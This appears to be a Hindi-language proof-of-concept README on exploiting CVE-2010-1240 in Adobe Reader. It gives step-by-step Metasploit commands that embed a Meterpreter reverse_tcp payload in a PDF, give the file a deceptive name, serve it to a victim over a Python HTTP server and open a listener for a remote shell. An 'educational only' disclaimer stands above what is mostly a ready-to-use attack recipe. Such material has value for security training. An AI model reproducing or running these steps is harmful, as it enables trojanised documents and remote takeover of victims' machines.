
शैक्षिक प्रमाण-अवधारणा जो दर्शाती है कि CVE-2010-1240 का शोषण करके PDF फ़ाइल में Meterpreter बैकडोर कैसे एम्बेड किया जाए, साथ ही अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण Metasploit निर्देश।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए
Adobe Reader और Acrobat 9.x (9.3.3 से पहले), तथा Windows और Mac OS X पर 8.x (8.2.3 से पहले), Launch File चेतावनी संवाद में एक टेक्स्ट फ़ील्ड की सामग्री को प्रतिबंधित नहीं करते हैं, जिससे दूरस्थ हमलावरों के लिए उपयोगकर्ताओं को PDF दस्तावेज़ में निर्दिष्ट किसी भी स्थानीय प्रोग्राम को निष्पादित करने के लिए धोखा देना आसान हो जाता है, जैसा कि एक टेक्स्ट फ़ील्ड द्वारा प्रदर्शित किया गया है जो दावा करता है कि Open बटन उपयोगकर्ता को एक एन्क्रिप्टेड संदेश पढ़ने में सक्षम करेगा।

सबसे पहले, msfconsole चलाएँ
msfconsole
फिर, PDF एम्बेड करने के लिए payload सेट करें
use exploit/windows/fileformat/adobe_pdf_embedded_exe
INFILENAME विकल्प सेट करें और मूल PDF फ़ाइल का सीधा पथ प्रदान करें
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
FILENAME विकल्प सेट करके नई बनाई गई दुर्भावनापूर्ण PDF फ़ाइल का नाम कुछ अधिक विश्वसनीय रखें
set FILENAME laporan.pdf
payload ढूंढें और उसे PDF फ़ाइल में एम्बेड करें
set payload windows/meterpreter/reverse_tcp
LHOST विकल्प को हमलावर के IP पर सेट करें
set LHOST 172.16.10.10
एक नया टर्मिनल खोलें और दुर्भावनापूर्ण PDF फ़ाइल के स्थान पर नेविगेट करें
cd .msf4/local/
Python में एक अस्थायी सर्वर बनाएँ
python -m http.server
पीड़ित की मशीन पर दुर्भावनापूर्ण PDF फ़ाइल डाउनलोड करें
http://172.16.10.10:8000/certificate.pdf
पीड़ित की मशीन पर दुर्भावनापूर्ण PDF फ़ाइल चलाने से पहले, पिछले टर्मिनल पर listener प्रारंभ करें
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
एक बार जब दुर्भावनापूर्ण PDF फ़ाइल पीड़ित की मशीन पर निष्पादित हो जाती है, तो यह आपको पीड़ित की मशीन से कनेक्शन दे देगी